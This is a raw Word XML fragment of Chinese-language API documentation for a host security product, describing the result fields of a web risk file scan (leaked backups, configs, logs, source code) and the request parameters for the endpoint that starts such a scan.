            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5501C8AC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="407C5330" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>标签</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6731FF27" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="439D9730" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0FBDEAC7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="03E47BB6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6F6A970F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6C395AF2" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="041659CE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="687FF71F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="10383E73" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(24)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="58C0819D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="35E72F60" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6F62D9DE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>port</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3E4CFF7A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2AF1BF77" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int(10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="174B1166" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>端口</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5A2EE6C3" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="01114DFF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>portStatus</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0FE9D421" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="187BBB13" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinyint(2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5DC49903" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>端口访问性：-1-未知；0-对内；1-对外</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="00E55633" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5457A0C1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>translate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="40BEE4C1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="765A9561" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinyint(2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0C219F34" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>解析方式：0-host解析；1-dns解析</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3D2D4612" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7928A0DD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>serverName</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="26B04349" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5312166B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="77F2EAF9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>域名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="646B666B" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0CE604DF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>filePath</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6F559ACD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4220A8BA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="79F5C3F4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>文件路径</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4249A09F" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0744FD9A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>regexLevel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7CC1B18B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2DC50EF8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int(6)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7BDC021A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>危险等级：1-低危；2-中危；3-高危</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="22C80F78" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1DA3D34C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>regexType</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="30EDD4CA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2F091C7B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int(6)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0B965F06" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>类型：'1'-'临时文件'; '2'-'压缩文件';'3'-'备份文件泄露';'4'-'数据文件泄露'；'5'-'配置文件泄露';'6'-'日志泄露';'7'-'脚本泄露';'8'-'Office文档';'9'-'源代码泄露';'10'-'系统文件';'11'-'phpinfo文件'</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4FD246E4" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="70064176" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>regexTypeDesc</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3B0A4806" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1479E746" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="23AA1AC9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>类型描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="076CFFAA" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="50F689AB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>checkUrl</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1D0C5418" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7D02D091" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="70083F30" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>验证路径</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="374CFE2E" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7B98CD88" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>modifyTime</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3011E420" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="39697412" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int(10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1D96A537" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>最后修改时间：时间戳，精确到秒</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4A2A3AB4" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1FC00454" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>download</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2472C749" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6253FAE8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinyint(1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4ACD89BF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是否可下载</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="46CFE019" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="511AEED2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>whiteRuleEffect</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1148C98E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="30690934" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinyint(1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4892E7B5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是否命中白名单</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2FD4F4A7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="108" w:name="web风险文件扫描"/>
      <w:bookmarkEnd w:id="107"/>
      <w:r>
        <w:t>Web风险文件扫描</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17BA6EC8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>该接口提供web风险文件执行扫描任务。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6638A667" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26549CA7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>POST /external/api/websecurity/weakfile/{linux|win}/check</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="170A8757"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497C54" w14:paraId="701B78C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9F6D1D3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5CDC4E7D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0ABBEC27" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>是否必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="665F465E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1DAF54BC" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="68F69648" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="56F03660" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinyint(4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5862E221" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="648A0359" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>0/1/2 全部主机/agent范围/业务组范围</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4D1D56AD" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6A527D3F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>agentIds</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="799BC8A1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>string数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="686CB428" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>如果type为1 必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2D48637C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机agentId数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2F25C1EF" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="79930163" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>group</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="17A92B4D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4FEEF805" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>如果type为2 必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1DADC9DC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>业务组id范围</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="568DAC77" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="141E2561" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>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agentIds"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"94e4c7a4f5dec750"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
